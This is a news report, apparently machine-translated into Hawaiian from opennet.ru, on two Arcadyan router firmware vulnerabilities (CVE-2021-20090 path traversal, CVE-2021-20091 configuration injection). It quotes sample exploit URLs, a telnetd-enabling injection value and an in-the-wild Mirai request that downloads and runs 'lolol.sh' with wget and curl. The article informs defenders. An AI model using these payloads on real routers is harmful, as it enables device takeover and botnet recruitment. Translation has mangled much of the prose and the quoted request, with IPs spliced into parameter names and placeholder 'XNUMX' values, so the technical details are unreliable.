Hoʻopilikia i nā mea hoʻokele home e pili ana i nā mea hana 17

Ua hoʻopaʻa ʻia kahi hoʻouka kaua nui ma ka pūnaewele e kūʻē i nā mea hoʻokele home nona ka firmware i hoʻohana i kahi hoʻokō server HTTP mai ka hui Arcadyan. No ka loaʻa ʻana o ka mana ma luna o nā hāmeʻa, hoʻohana ʻia kahi hui o ʻelua mau nāwaliwali e hiki ai ke hoʻokō mamao i nā code arbitrary me nā kuleana kumu. Hoʻopilikia ka pilikia i kahi ākea ākea o nā mea hoʻokele ADSL mai Arcadyan, ASUS a me Buffalo, a me nā mea i hoʻolako ʻia ma lalo o nā brand Beeline (ua hōʻoia ʻia ka pilikia ma Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone a me nā mea lawelawe kelepona ʻē aʻe. Ua ʻike ʻia aia ka pilikia ma Arcadyan firmware no nā makahiki he 10 a i kēia manawa ua hoʻokele i ka neʻe ʻana i ka liʻiliʻi o 20 mau hiʻohiʻona mai 17 mau mea hana like ʻole.

ʻO ka haʻahaʻa mua, CVE-2021-20090, hiki iā ia ke komo i kekahi palapala kikowaena pūnaewele me ka ʻole o ka hōʻoia. ʻO ke kumu o ka nāwaliwali, ʻo ia i loko o ka pūnaewele pūnaewele, hiki ke loaʻa i kekahi mau papa kuhikuhi kahi i hoʻouna ʻia ai nā kiʻi, nā faila CSS a me nā palapala JavaScript me ka ʻole o ka hōʻoia. I kēia hihia, nānā ʻia nā papa kuhikuhi i ʻae ʻia me ka ʻole o ka hōʻoia me ka hoʻohana ʻana i ka mask mua. ʻO ka wehewehe ʻana i nā huaʻōlelo "../" ma nā ala e hele ai i ka papa kuhikuhi makua e ālai ʻia e ka firmware, akā hoʻohana ʻia ka hui "..%2f". No laila, hiki ke wehe i nā ʻaoʻao i pale ʻia i ka hoʻouna ʻana i nā noi e like me "http://192.168.1.1/images/..%2findex.htm".

ʻO ka lua o ka nāwaliwali, CVE-2021-20091, e ʻae i ka mea hoʻohana i hōʻoia ʻia e hoʻololi i nā hoʻonohonoho ʻōnaehana o ka hāmeʻa ma o ka hoʻouna ʻana i nā ʻāpana i hoʻohālikelike ʻia i ka palapala apply_abstract.cgi, ʻaʻole ia e nānā i ke ʻano o kahi ʻano laina hou i nā ʻāpana. . No ka laʻana, i ka wā e hana ai i kahi hana ping, hiki i ka mea hoʻouka ke kuhikuhi i ka waiwai "192.168.1.2%0AARC_SYS_TelnetdEnable=1" ma ke kahua me ka nānā ʻana o ka IP address, a me ka palapala, i ka wā e hana ai i ka faila hoʻonohonoho /tmp/etc/config/ .glbcfg, e kākau i ka laina “AARC_SYS_TelnetdEnable=1” i loko ona ", e ho'ā ana i ka server telnetd, e hāʻawi ana i ke komo ʻana i ka shell kauoha palena ʻole me nā kuleana kumu. Pēlā nō, ma ka hoʻonohonoho ʻana i ka parameter AARC_SYS, hiki iā ʻoe ke hoʻokō i kekahi code ma ka ʻōnaehana. ʻO ka nāwaliwali mua e hiki ai ke holo i kahi palapala pilikia me ka ʻole o ka hōʻoia ʻana ma ke komo ʻana iā ia ma ke ʻano he "/images/..%2fapply_abstract.cgi".

No ka hoʻohana ʻana i nā nāwaliwali, pono e hiki i ka mea hoʻouka ke hoʻouna i kahi noi i ke awa pūnaewele kahi e holo ai ka ʻaoʻao pūnaewele. Ke hoʻoholo nei i ka dynamics o ka hoʻolaha ʻana o ka hoʻouka ʻana, nui nā mea hana e waiho i ke komo ʻana i kā lākou mau polokalamu mai ka pūnaewele waho e hoʻomaʻamaʻa i ka ʻike o nā pilikia e ka lawelawe kākoʻo. Inā kaupalena ʻia ke komo ʻana i ka interface i ka pūnaewele kūloko, hiki ke hoʻouka ʻia kahi hoʻouka ʻana mai kahi pūnaewele waho me ka hoʻohana ʻana i ka ʻenehana "DNS rebinding". Ke hoʻohana ikaika ʻia nei nā mea ʻino no ka hoʻopili ʻana i nā mea ala i ka botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: pani Mea hoʻohana-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress.0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Source: opennet.ru

Pākuʻi i ka manaʻo hoʻopuka